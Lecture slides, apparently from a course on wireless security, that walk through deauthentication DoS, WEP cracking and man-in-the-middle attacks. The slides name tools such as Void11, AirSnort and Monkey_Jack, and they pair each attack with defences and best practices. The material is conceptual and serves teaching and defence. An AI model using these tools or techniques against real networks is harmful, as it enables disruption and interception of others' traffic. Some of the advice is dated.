Class 9 032904

1
Class 903-29-04

• Wireless Security
• Attack Technologies and How to Defend Against
  Them

2
Goals

• Example of 3 attacks and tools used
• How to protect against these attacks
• Future Attack Trends
• Future 802.11 security standards
• Best Practices

3
Attack Scenario 1

• Wireless classroom
• Sudden disruption in connectivity
• Then almost complete loss of wireless
  connectivity
• What is going on here?

4
Attack Scenario 1

• Look at sniffer logs
• What kind of attack is occurring?
• How is the attack being conducted?
• How does the attacker get control?

5
Denial of Service Attacks

• DoS are most prevalent
• Range from bursts to prolonged service
  deprivations
• DoS Attack Tools
• Available for most Unix platforms
• Very easy to implement

6
DoS Attack Tool Void11

• Trivial to spoof MAC address of AP
• Void11 options
• Single client or entire network
• Flood - Disassociate or Deauthenticate
• Resource Starvation - Deauthentication
• Stations are kicked off

7
DoS Damages

• Growing trend to rely on wireless services
  without ability to prevent these attacks
• Wide area of coverage
• High gain antennas and RF amplifiers
• Equipment is easily concealed

8
Wireless DoS Mitigation

• Channel Switching
• Not full-proof
• Find the attacker
• Little else can be done to lessen the impact
  under the circumstances
• Applications can sustain downtime

9
Attack Scenario 2

• Weak WEP Keys
• AirJack, WEPCrack, BSD-Airtools, AirSnort
• WEP reinjection attack tool reinj.c
• Accelerates frame traffic by reinjecting TCP SYN
  or ARP frames
• WEP key recovery possible in less than 60 minutes
  

10
More about WEP

• Only data packets are encrypted
• Link layer packets are unencrypted
• WEP is shared private key
• Transparent protection

11
A Word about Wireless Detection

• Detecting wireless networks
• Active probes Netstumbler, Ministumbler
• Example of War Chalking
• Passive probes Kismet, Wellenreiter, Airsnort

12
WEB Attack Mitigation

• Use dynamic WEP keying
• Asymmetric WEP keys
• WEP (upgraded firmware)
• Disable unnecessary traffic
• Broadband and multicast traffic from wired
  network to wireless network

13
Some Defensive Myths

• SSID Cloaking
• Transparent protection
• Non-Beaconing
• SSID is still detectable
• Registering MAC Addresses
• Easy to spoof
• Administrative burden

14
Attack Scenarios 3

• MITM Attack
• Insert attack machine between victim and access
  point
• Attacker needs proximity to network
• Two wireless cards
• AirJack by Abaddon
• Monkey_Jack
• Kracker_Jack
• Also includes DoS tools

15
Monkey-Jack

• Attacker launches DoS attack
• Victims 802.11 card scans channels to search for
  new AP
• Victims 802.11 card associates with fake AP on
  the attack machine
• Attack machine associates with real AP
• Attack machine is now inserted and can pass
  frames through in a manner that is transparent to
  the upper level protocols

16
Before Monkey-Jack
17
After Monkey-Jack
18
Monkey_Jack
19
How Monkey_Jack Works

• No per-packet authentication
• Client or AP can easily be spoofed
• Client station will actively scan for new AP
  after being disassociated
• Attacker impersonates AP
• Offers authentication
• Legitimate AP is clueless

20
MITM Damages

• VPN attacks Kracker_Jack
• Wireless networks are more vulnerable to MITM
  attacks than wired networks
• LEAP, EAP-MD5
• Many VPN solutions are implemented with
  inadequate authentication for protection against
  wireless MITM attacks
• DSniff attack suite by Dug Song
• Compromise of SSL traffic, DNS queries, etc.

21
Defense Against MITM Attacks

• Use multiple authentication EAP types
• PEAP, TTLS or EAP/TLS
• Support WPA, 802.11i spec
• When possible, configure clients to detect
  presence of TLS tunnel
• Authentication credentials inside TLS tunnel
• Ask vendors to implement this feature

22
Future Attack Trends

• Complex attack tools
• More DoS attacks
• Firmware flaws
• Faster WEP cracking and more effective
  reinjection
• Attacks against PEAP, TTLS, EAP/TLS, TKIP
• Attacks we dont know about yet

23
Future Security Standards

• WPA and 802.11i
• Hot Spots effective key distribution
• TKIP (Temporal Key Integrity Protocol) and 802.1x
  mechanisms
• Dynamic key encryption
• Mutual authentication
• Integration with authentication server (e.g.,
  RADIUS) using 802.1x with EAP
• Preshared keys (i.e., pass phrases)

24
802.11i

• AES (stronger than RC4)
• Will require replacement of equipment
• 128, 192 or 256 bit key sizes
• Two strong authentication features
• WRAP
• CCMP
• Ratification in 2004?

25
Best Practices

• Enable all built-in security capabilities
• Avoiding signal leaks
• Use VPN strong mutual authentication
• Wireless IDS and Monitoring
• Kismet
• Lots of features FREE
• AirDefense
• Buy equipment that can be upgraded to new
  security standards

26
Resources

• Void11 wlsec.net/void11
• AirJack 802.11ninja.net
• Kismet www.kismetwireless.net
• AirDefense www.airdefense.net
• AirSnort airsnort.shmoo.com
• Finland Nokia Group paper on tunneled
  authentication/MITM
• www.saunalahti.fi/asokan/research/tunnel.pdf
• WEPCrack wepcrack.sourceforge.net
• DSniff - naughty.monkey.org/dugsong/dsniff/

27
HomeWork

• Read over EAP-TLS Doc
• One Page Bullits